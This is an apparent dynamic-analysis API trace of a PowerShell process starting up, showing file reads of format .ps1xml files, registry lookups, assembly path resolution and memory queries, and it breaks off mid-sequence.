[0079.430] ReadFile (in: hFile=0x30c, lpBuffer=0x3482e38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3482e38*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.430] ReadFile (in: hFile=0x30c, lpBuffer=0x3482e38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3482e38*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.430] ReadFile (in: hFile=0x30c, lpBuffer=0x3482e38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3482e38*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.430] ReadFile (in: hFile=0x30c, lpBuffer=0x3482e38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3482e38*, lpNumberOfBytesRead=0x16cfd8*=0xaca, lpOverlapped=0x0) returned 1
[0079.431] ReadFile (in: hFile=0x30c, lpBuffer=0x348246a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x348246a*, lpNumberOfBytesRead=0x16cfd8*=0x0, lpOverlapped=0x0) returned 1
[0079.431] ReadFile (in: hFile=0x30c, lpBuffer=0x3482e38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3482e38*, lpNumberOfBytesRead=0x16cfd8*=0x0, lpOverlapped=0x0) returned 1
[0079.431] CloseHandle (hObject=0x30c) returned 1
[0079.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.431] SetErrorMode (uMode=0x1) returned 0x1
[0079.431] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16cf80 | out: lpFileInformation=0x16cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
[0079.432] SetErrorMode (uMode=0x1) returned 0x1
[0079.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.432] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d068 | out: phkResult=0x16d068*=0x30c) returned 0x0
[0079.432] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16cfec, lpData=0x0, lpcbData=0x16cfe8*=0x0 | out: lpType=0x16cfec*=0x1, lpData=0x0, lpcbData=0x16cfe8*=0x56) returned 0x0
[0079.432] CoTaskMemAlloc (cb=0x5a) returned 0x2f94d0
[0079.432] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16cfbc, lpData=0x2f94d0, lpcbData=0x16cfb8*=0x56 | out: lpType=0x16cfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16cfb8*=0x56) returned 0x0
[0079.432] CoTaskMemFree (pv=0x2f94d0)
[0079.432] RegCloseKey (hKey=0x30c) returned 0x0
[0079.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x16c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
[0079.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0079.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x16c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
[0079.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x16c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
[0079.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x16c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
[0079.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x16c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
[0079.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x16c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
[0079.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x16c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
[0079.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x16c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
[0079.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x16c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
[0079.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
[0079.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x16c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
[0079.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x16c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
[0079.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x16c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
[0079.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x16c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
[0079.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0079.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x16c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
[0079.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.631] VirtualQuery (in: lpAddress=0x16bb00, lpBuffer=0x16c9c0, dwLength=0x30 | out: lpBuffer=0x16c9c0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.632] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xd752f41d, Data2=0x2a1e, Data3=0x48c0, Data4=([0]=0xae, [1]=0x11, [2]=0xa1, [3]=0x70, [4]=0xb4, [5]=0xf2, [6]=0xf6, [7]=0x1e))) returned 0x0
[0079.632] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x3be430e6, Data2=0x6cf6, Data3=0x4963, Data4=([0]=0x85, [1]=0xa1, [2]=0x85, [3]=0x58, [4]=0x36, [5]=0xf8, [6]=0x52, [7]=0x26))) returned 0x0
[0079.633] VirtualQuery (in: lpAddress=0x16bcb0, lpBuffer=0x16cb70, dwLength=0x30 | out: lpBuffer=0x16cb70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.634] VirtualQuery (in: lpAddress=0x16bcb0, lpBuffer=0x16cb70, dwLength=0x30 | out: lpBuffer=0x16cb70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.634] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x590c295a, Data2=0x42c0, Data3=0x4512, Data4=([0]=0x85, [1]=0x30, [2]=0x43, [3]=0x3b, [4]=0x49, [5]=0xe0, [6]=0x35, [7]=0xd3))) returned 0x0
[0079.636] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xbadb401e, Data2=0x6ee1, Data3=0x4ca7, Data4=([0]=0x92, [1]=0xe7, [2]=0x79, [3]=0x3e, [4]=0x10, [5]=0x4a, [6]=0x31, [7]=0x3f))) returned 0x0
[0079.636] VirtualQuery (in: lpAddress=0x16bf00, lpBuffer=0x16cdc0, dwLength=0x30 | out: lpBuffer=0x16cdc0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.636] VirtualQuery (in: lpAddress=0x16bc40, lpBuffer=0x16cb00, dwLength=0x30 | out: lpBuffer=0x16cb00*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.637] VirtualQuery (in: lpAddress=0x16bc40, lpBuffer=0x16cb00, dwLength=0x30 | out: lpBuffer=0x16cb00*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.637] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x4902a71d, Data2=0xafa8, Data3=0x4d8c, Data4=([0]=0xaa, [1]=0xa0, [2]=0x30, [3]=0x92, [4]=0x9e, [5]=0xc3, [6]=0x6c, [7]=0x83))) returned 0x0
[0079.637] VirtualQuery (in: lpAddress=0x16bf00, lpBuffer=0x16cdc0, dwLength=0x30 | out: lpBuffer=0x16cdc0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.637] VirtualQuery (in: lpAddress=0x16bd20, lpBuffer=0x16cbe0, dwLength=0x30 | out: lpBuffer=0x16cbe0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.637] VirtualQuery (in: lpAddress=0x16b570, lpBuffer=0x16c430, dwLength=0x30 | out: lpBuffer=0x16c430*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.637] VirtualQuery (in: lpAddress=0x16b570, lpBuffer=0x16c430, dwLength=0x30 | out: lpBuffer=0x16c430*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.638] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xee233c76, Data2=0x58bd, Data3=0x4357, Data4=([0]=0x9e, [1]=0xdb, [2]=0x8f, [3]=0xc7, [4]=0xfc, [5]=0x3b, [6]=0xf, [7]=0x17))) returned 0x0
[0079.638] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x2a914f4d, Data2=0x10d5, Data3=0x4a45, Data4=([0]=0xb5, [1]=0xc5, [2]=0xe6, [3]=0x65, [4]=0x2a, [5]=0xac, [6]=0xf8, [7]=0x66))) returned 0x0
[0079.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.638] SetErrorMode (uMode=0x1) returned 0x1
[0079.638] SetErrorMode (uMode=0x1) returned 0x1
[0079.638] GetFileType (hFile=0x30c) returned 0x1
[0079.638] ReadFile (in: hFile=0x30c, lpBuffer=0x35353d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x35353d0*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.640] ReadFile (in: hFile=0x30c, lpBuffer=0x35353d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x35353d0*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.641] ReadFile (in: hFile=0x30c, lpBuffer=0x35353d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x35353d0*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.641] ReadFile (in: hFile=0x30c, lpBuffer=0x35353d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x35353d0*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.641] ReadFile (in: hFile=0x30c, lpBuffer=0x35353d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x35353d0*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.641] ReadFile (in: hFile=0x30c, lpBuffer=0x35353d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x35353d0*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.642] ReadFile (in: hFile=0x30c, lpBuffer=0x35353d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x35353d0*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.642] ReadFile (in: hFile=0x30c, lpBuffer=0x35353d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x35353d0*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.642] ReadFile (in: hFile=0x30c, lpBuffer=0x35353d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x35353d0*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.642] ReadFile (in: hFile=0x30c, lpBuffer=0x35353d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x35353d0*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.643] ReadFile (in: hFile=0x30c, lpBuffer=0x35353d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x35353d0*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.643] ReadFile (in: hFile=0x30c, lpBuffer=0x35353d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x35353d0*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.643] ReadFile (in: hFile=0x30c, lpBuffer=0x35353d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x35353d0*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.643] ReadFile (in: hFile=0x30c, lpBuffer=0x35353d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x35353d0*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.643] ReadFile (in: hFile=0x30c, lpBuffer=0x35353d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x35353d0*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.643] ReadFile (in: hFile=0x30c, lpBuffer=0x35353d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x35353d0*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.644] ReadFile (in: hFile=0x30c, lpBuffer=0x35353d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x35353d0*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.644] ReadFile (in: hFile=0x30c, lpBuffer=0x35353d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x35353d0*, lpNumberOfBytesRead=0x16cfd8*=0xbce, lpOverlapped=0x0) returned 1
[0079.645] ReadFile (in: hFile=0x30c, lpBuffer=0x3534b06, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3534b06*, lpNumberOfBytesRead=0x16cfd8*=0x0, lpOverlapped=0x0) returned 1
[0079.645] ReadFile (in: hFile=0x30c, lpBuffer=0x35353d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x35353d0*, lpNumberOfBytesRead=0x16cfd8*=0x0, lpOverlapped=0x0) returned 1
[0079.645] CloseHandle (hObject=0x30c) returned 1
[0079.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.645] SetErrorMode (uMode=0x1) returned 0x1
[0079.645] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16cf80 | out: lpFileInformation=0x16cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
[0079.645] SetErrorMode (uMode=0x1) returned 0x1
[0079.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.645] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d068 | out: phkResult=0x16d068*=0x30c) returned 0x0
[0079.645] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16cfec, lpData=0x0, lpcbData=0x16cfe8*=0x0 | out: lpType=0x16cfec*=0x1, lpData=0x0, lpcbData=0x16cfe8*=0x56) returned 0x0
[0079.645] CoTaskMemAlloc (cb=0x5a) returned 0x2f9460
